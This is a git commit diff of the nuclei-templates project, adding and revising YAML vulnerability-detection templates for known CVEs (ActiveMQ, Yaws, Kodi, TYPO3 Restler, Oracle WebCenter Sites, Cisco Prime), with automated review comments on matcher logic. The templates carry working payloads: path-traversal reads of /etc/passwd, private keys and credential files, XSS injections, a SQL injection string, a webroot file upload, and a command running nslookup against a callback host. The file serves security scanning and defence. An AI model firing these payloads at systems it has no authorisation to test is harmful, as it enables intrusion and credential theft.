Merge branch 'master' into token-spray-fix
commit
7e19fd22df
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
|
| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 |
|
||||||
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
|
| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 |
|
||||||
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
|
| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 |
|
||||||
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
|
| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 |
|
||||||
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
|
| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | |
|
||||||
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
|
| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | |
|
||||||
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
|
| rce | 222 | gy741 | 85 | token-spray | 102 | | | | |
|
||||||
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
|
| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | |
|
||||||
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
|
| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | |
|
||||||
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
|
| cve2021 | 169 | madrobot | 65 | file | 57 | | | | |
|
||||||
|
|
||||||
**178 directories, 2459 files**.
|
**182 directories, 2531 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
1909
TEMPLATES-STATS.md
1909
TEMPLATES-STATS.md
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
|
| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 |
|
||||||
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
|
| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 |
|
||||||
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
|
| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 |
|
||||||
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
|
| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 |
|
||||||
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
|
| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | |
|
||||||
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
|
| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | |
|
||||||
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
|
| rce | 222 | gy741 | 85 | token-spray | 102 | | | | |
|
||||||
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
|
| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | |
|
||||||
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
|
| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | |
|
||||||
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
|
| cve2021 | 169 | madrobot | 65 | file | 57 | | | | |
|
||||||
|
|
|
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2016-3088
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
|
||||||
|
author: fq_hsu
|
||||||
|
severity: critical
|
||||||
|
description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/40857
|
||||||
|
- https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
|
||||||
|
- http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-3088
|
||||||
|
tags: fileupload,cve,cve2016,apache,activemq
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2016-3088
|
||||||
|
cwe-id: CWE-20
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
PUT /fileserver/test.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
{{randstr}}
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /fileserver/test.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "status_code_1==204"
|
||||||
|
- "status_code_2==200"
|
||||||
|
- "contains((body_2), '{{randstr}}')"
|
||||||
|
condition: and
|
|
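Review bot: The PUT at the top of the `requests` block writes `/fileserver/test.txt` under a fixed, predictable name and nothing removes it, so every scan leaves an artifact on the target and two scans of the same host overwrite each other's file, which can make `contains((body_2), '{{randstr}}')` fail spuriously. On the same assumption the template already makes (that `{{randstr}}` is stable across the two requests), `PUT /fileserver/{{randstr}}.txt HTTP/1.1` and `GET /fileserver/{{randstr}}.txt HTTP/1.1` avoid the collision, and a final `DELETE /fileserver/{{randstr}}.txt HTTP/1.1` would clean up if the fileserver honours DELETE (not verified here). The description mentions PUT followed by MOVE, whereas the template stops at the PUT; that is the safe choice, and a comment such as `# PUT only: proves the unauthenticated write without the MOVE step the full exploit uses` records why.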
@ -39,7 +39,7 @@ requests:
|
||||||
<string>-c</string>
|
<string>-c</string>
|
||||||
</void>
|
</void>
|
||||||
<void index="2">
|
<void index="2">
|
||||||
<string>wget {{interactsh-url}}</string>
|
<string>nslookup {{interactsh-url}}</string>
|
||||||
</void>
|
</void>
|
||||||
</array>
|
</array>
|
||||||
<void method="start"/></void>
|
<void method="start"/></void>
|
||||||
|
@ -49,8 +49,13 @@ requests:
|
||||||
<soapenv:Body/>
|
<soapenv:Body/>
|
||||||
</soapenv:Envelope>
|
</soapenv:Envelope>
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the DNS interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "dns"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
|
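Review bot: The new `matchers-condition: and` together with the added `status: 500` matcher means a DNS callback from the injected `nslookup` is only reported when the SOAP response is also a 500, so a host that executes the payload but answers 200 or 404 is recorded as not vulnerable, although the out-of-band interaction is by itself the proof of execution. If the 500 is intentional (an error page is the expected response on affected versions), say so next to the matcher, e.g. `# affected versions answer 500 once the payload runs; the DNS interaction is the actual proof`, otherwise drop the status matcher. Switching from `wget` to `nslookup` also changes what the callback depends on, since that binary must exist on the target's PATH, and that assumption belongs in the same comment. The enclosing `requests` entry starts outside this hunk.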
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2017-10974
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Yaws 1.91 - Remote File Disclosure
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: Yaws 1.91 allows Unauthenticated Remote File Disclosure via HTTP Directory Traversal with /%5C../ to port 8080
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/42303
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-10974
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2017-10974
|
||||||
|
cwe-id: CWE-22
|
||||||
|
tags: cve,cve2017,yaws,lfi
|
||||||
|
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/%5C../ssl/yaws-key.pem"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "BEGIN RSA PRIVATE KEY"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '!contains(tolower(body), "<html")'
|
||||||
|
- '!contains(tolower(body), "<HTML")'
|
||||||
|
condition: or
|
|
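Review bot: The `dsl` matcher at the bottom of this template is a no-op: both expressions lower-case the body first, so `!contains(tolower(body), "<HTML")` is always true, and with `condition: or` the whole matcher passes on every response. One expression is enough, `- '!contains(tolower(body), "<html")'`, and the `condition: or` line can go. The word matcher only recognises `BEGIN RSA PRIVATE KEY`; a key stored in PKCS#8 or EC form starts with `BEGIN PRIVATE KEY` or `BEGIN EC PRIVATE KEY`, so a regex matcher `- 'BEGIN (RSA |EC )?PRIVATE KEY'` covers the same file however it was generated. A hit means the scanner pulled the server's TLS private key over the wire, so response dumps from this template should be kept out of shared logs.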
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2017-15363
|
||||||
|
info:
|
||||||
|
name: Typo3 Restler Extension - Local File Disclosure
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/42985
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2017-15363
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2017-15363
|
||||||
|
cwe-id: CWE-98
|
||||||
|
tags: cve,cve2017,restler,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<?php"
|
||||||
|
- "'host'"
|
||||||
|
- "'database'"
|
||||||
|
- "'extConf'"
|
||||||
|
- "'debug'"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
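Review bot: `cwe-id: CWE-98` does not fit the description in the same template, which reads arbitrary files through the `file` parameter (a path traversal, CWE-22); CWE-98 is PHP include/require of an attacker-controlled filename, which this PoC does not demonstrate. Change the line to `cwe-id: CWE-22` unless NVD classifies it otherwise, which is worth checking since the two weaknesses carry different remediation advice. The proof file is `LocalConfiguration.php`, which on TYPO3 holds the database credentials and the encryption key, so a positive match is itself a credential exposure; a comment on the path line such as `# LocalConfiguration.php carries DB credentials and the encryptionKey; do not store matched bodies` makes that explicit.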
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2017-5982
|
||||||
|
info:
|
||||||
|
name: Kodi 17.1 Local File Inclusion
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: Insufficient validation of user input is performed on this URL resulting in a local file inclusion vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://cxsecurity.com/issue/WLB-2017020164
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2017-5982
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2017-5982
|
||||||
|
cwe-id: CWE-98
|
||||||
|
tags: cve,cve2017,kodi,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
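Review bot: The `description` says only "on this URL" without naming it, and `cwe-id: CWE-98` (PHP file inclusion) does not match what the request does, which is a traversal read of `/etc/passwd` through the `/image/` endpoint. Suggested wording: `description: Kodi 17.1 allows directory traversal via the /image/ endpoint, where the image:// URL argument is used as a local path, permitting local files such as /etc/passwd to be read.` together with `cwe-id: CWE-22`, pending a check against NVD. The double-encoded `%252f` in the path looks deliberate (presumably a second decode happens on the target, per the reference); a one-line comment above the path saying so would stop the next maintainer from "normalising" it to `%2f` and silently breaking the check.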
@ -25,7 +25,7 @@ requests:
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "admin:.*:"
|
- "admin:.*:*sh$"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
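Review bot: The new regex `admin:.*:*sh$` does not express the shell check it looks like: `:*` means zero or more colons, and in the RE2 syntax nuclei uses `$` anchors to the end of the whole body unless the multi-line flag is set, so the pattern only matches when the `admin` entry happens to be the last line of the response. Something like `- '(?m)^admin:.*:[^:\n]*sh$'` keeps the intent (an `admin` account whose shell field ends in `sh`) and works wherever the line sits. Worth a quick check against a captured response, because the old `admin:.*:` was loose but at least matched. The enclosing matcher list starts before this hunk.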
@ -1,11 +1,10 @@
|
||||||
id: CVE-2018-2791
|
id: CVE-2018-2791
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Oracle WebCenter Sites XSS
|
name: Oracle WebCenter Sites Multiple XSS
|
||||||
author: madrobot
|
author: madrobot,leovalcante
|
||||||
severity: high
|
severity: high
|
||||||
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware.
|
||||||
tags: cve,cve2018,oracle,xss
|
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
|
||||||
cvss-score: 8.20
|
cvss-score: 8.20
|
||||||
|
@ -15,20 +14,30 @@ info:
|
||||||
- http://www.securitytracker.com/id/1040695
|
- http://www.securitytracker.com/id/1040695
|
||||||
- http://www.securityfocus.com/bid/103800
|
- http://www.securityfocus.com/bid/103800
|
||||||
- https://www.exploit-db.com/exploits/44752/
|
- https://www.exploit-db.com/exploits/44752/
|
||||||
|
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||||
|
tags: cve,cve2018,oracle,xss,wcs
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError"
|
GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
||||||
|
Host: {{BaseURL}}
|
||||||
|
|
||||||
matchers-condition: and
|
- |
|
||||||
|
GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1
|
||||||
|
Host: {{BaseURL}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
|
||||||
- "<h1xxx<scriptalert(1)</script"
|
|
||||||
part: body
|
part: body
|
||||||
|
words:
|
||||||
|
- '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- "text/html"
|
- '<script>alert(24)</script>'
|
||||||
part: header
|
- 'Missing translation key'
|
||||||
|
condition: and
|
|
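Review bot: Both raw requests in the rewritten `requests` block send `Host: {{BaseURL}}`, which expands to a full URL including scheme (and port/path) rather than a host name; the other templates in this commit use `Host: {{Hostname}}`, and both lines here should read the same, otherwise the virtual-host lookup on the target fails. Separately, the second request injects `alert(document.domain)` through `destpage`, but the only matcher that could catch that reflection looks for `<script>alert(24)</script>`, a value nothing in this template sends, so the second payload can never produce a match unless the server rewrites it (hedged); changing that word to `'<script>alert(document.domain)</script>'` lines the matcher up with the request. The first matcher's `/graphics/common/screen/dotclear.gif` suffix is specific to the `cs_imagedir` reflection and is fine as is.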
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2018-3238
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Multiple XSS Oracle WebCenter Sites
|
||||||
|
author: leovalcante
|
||||||
|
severity: medium
|
||||||
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 11.1.1.8.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites.
|
||||||
|
reference:
|
||||||
|
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-3238
|
||||||
|
tags: cve,cve2018,oracle,wcs,xss
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
|
||||||
|
cvss-score: 6.90
|
||||||
|
cve-id: CVE-2018-3238
|
||||||
|
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"><script>alert(document.domain)</script> HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<script>alert(document.domain)</script>'
|
||||||
|
- 'Variables.cs_imagedir'
|
||||||
|
condition: and
|
|
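Review bot: Requests two and three inject through `WemUI`, but neither matcher can confirm them: matcher one keys on `/graphics/common/screen/dotclear.gif` and matcher two requires `Variables.cs_imagedir`, both of which belong to the `cs_imagedir` reflection used by request one, so a host vulnerable only through `WemUI` would not be reported (hedged; only a captured response would settle it). A third word matcher carrying just `'<script>alert(document.domain)</script>'` with `part: body` would cover those two, accepting the small false-positive risk the `or` condition already implies. `classification` is also missing the `cwe-id: CWE-79` line that the other XSS templates in this commit carry.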
@ -0,0 +1,57 @@
|
||||||
|
id: CVE-2019-1821
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cisco Prime Infrastructure Unauthorized RCE (CVE-2019-1821)
|
||||||
|
author: _0xf4n9x_
|
||||||
|
severity: critical
|
||||||
|
description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-1821
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"prime infrastructure"'
|
||||||
|
tags: rce,fileupload,unauth,cve,cve2019
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2019-1821
|
||||||
|
cwe-id: CWE-20
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /servlet/UploadServlet HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Primary-IP: 127.0.0.1
|
||||||
|
Filename: test.tar
|
||||||
|
Filesize: 10240
|
||||||
|
Compressed-Archive: false
|
||||||
|
Destination-Dir: tftpRoot
|
||||||
|
Filecount: 1
|
||||||
|
Content-Length: 269
|
||||||
|
Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83
|
||||||
|
|
||||||
|
--871a4a346a547cf05cb83f57b9ebcb83
|
||||||
|
Content-Disposition: form-data; name="files"; filename="test.tar"
|
||||||
|
|
||||||
|
../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}}
|
||||||
|
--871a4a346a547cf05cb83f57b9ebcb83--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /test.txt HTTP/1.1
|
||||||
|
Host: {{Host}}
|
||||||
|
Connection: close
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "status_code==200"
|
||||||
|
- "contains((body_2), '{{randstr}}')"
|
||||||
|
condition: and
|
|
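Review bot: The second raw request sends `Host: {{Host}}` while the first uses `{{Hostname}}`; `{{Host}}` omits the port, so the follow-up GET carries a Host header that differs from the upload request's and can land on a different virtual host — use `Host: {{Hostname}}` in both. In the same block, `status_code==200` in the DSL is ambiguous with two responses in play (the upload POST and the read-back GET), and `status_code_2==200` pins it to the GET. The tar header's size field reads `00000000004` (octal, four bytes), so if the server honours it only the first four characters of `{{randstr}}` are written to `test.txt` and `contains((body_2), '{{randstr}}')` can never be true; confirm against a target or regenerate the header for the real payload length. A positive here means the scanner has written a fixed-name file into the Tomcat webroot with no cleanup, which deserves a comment such as `# writes ROOT/test.txt on the target and does not remove it`.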
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2019-2578
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Broken Access Control Oracle WebCenter Sites
|
||||||
|
author: leovalcante
|
||||||
|
severity: high
|
||||||
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
|
||||||
|
reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||||
|
tags: cve,cve2019,oracle,wcs,auth-bypass
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||||
|
cvss-score: 8.60
|
||||||
|
cve-id: CVE-2019-2578
|
||||||
|
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '<script[\d\D]*<throwexception/>'
|
|
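Review bot: `reference:` is written as a bare scalar here while every other template in this commit uses a list, and the NVD entry is missing, so tooling that iterates references sees one string rather than a sequence; `reference:` followed by `- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites` and `- https://nvd.nist.gov/vuln/detail/CVE-2019-2578` keeps it consistent. The single regex `<script[\d\D]*<throwexception/>` has no status check and both admin pages are fetched without a session, so the match is a page-shape heuristic rather than proof that protected data came back (hedged); a comment such as `# heuristic: an exposed admin page presumably renders <throwexception/>; confirm manually before reporting` sets expectations for whoever triages the hit.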
@ -0,0 +1,51 @@
|
||||||
|
id: CVE-2019-2579
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Oracle WebCenter Sites - SQL Injection
|
||||||
|
author: leovalcante
|
||||||
|
severity: medium
|
||||||
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
|
||||||
|
reference:
|
||||||
|
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||||
|
- https://github.com/Leovalcante/wcs_scanner
|
||||||
|
tags: cve,cve2019,oracle,wcs,sqli
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 4.30
|
||||||
|
cve-id: CVE-2019-2579
|
||||||
|
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /cs/ContentServer HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: authkey
|
||||||
|
part: body
|
||||||
|
internal: true
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "value='' and '1'='0 --"
|
||||||
|
- "Use this utility to view and manage URLs"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
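Review bot: The matchers on this template do not demonstrate the injection: `value='' and '1'='0 --` is the search form echoing the submitted `searchText` back, and `Use this utility to view and manage URLs` plus a 200 is the admin page rendering, both of which a non-injectable but exposed page would also produce (hedged; only a response from a patched build would settle it). A boolean differential is the usual way to pin SQLi here: send the POST twice with `'1'='1` and `'1'='0` and assert in a DSL matcher that the two bodies differ in the results region, or at minimum look for a database error string in the `'1'='0` response. The `_authkey_` extraction with `internal: true` and `cookie-reuse: true` is the right shape for chaining the two requests.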
@ -0,0 +1,33 @@
|
||||||
|
